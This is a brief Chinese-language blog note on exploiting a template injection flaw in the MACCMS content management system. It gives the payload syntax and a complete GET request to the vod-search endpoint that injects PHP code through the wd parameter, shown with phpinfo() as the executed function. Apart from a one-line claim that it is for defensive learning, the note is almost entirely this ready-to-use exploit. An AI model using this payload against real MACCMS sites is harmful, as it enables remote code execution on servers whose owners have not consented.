【笔记】MACCMS模板注入漏洞利用

发表于 更新于 阅读次数:

前言

MACCMS模板注入漏洞利用

本文仅用于网络信息防御学习

payload

phpinfo():PHP代码,不能包含空格,不能包含分号
A:可以是任意字符,只要保证前后相同即可

request
1
2
GET /index.php?m=vod-search&wd={if-A:phpinfo()}{endif-A}
Host: example.com

完成

参考文献

哔哩哔哩——逆风微笑的代码狗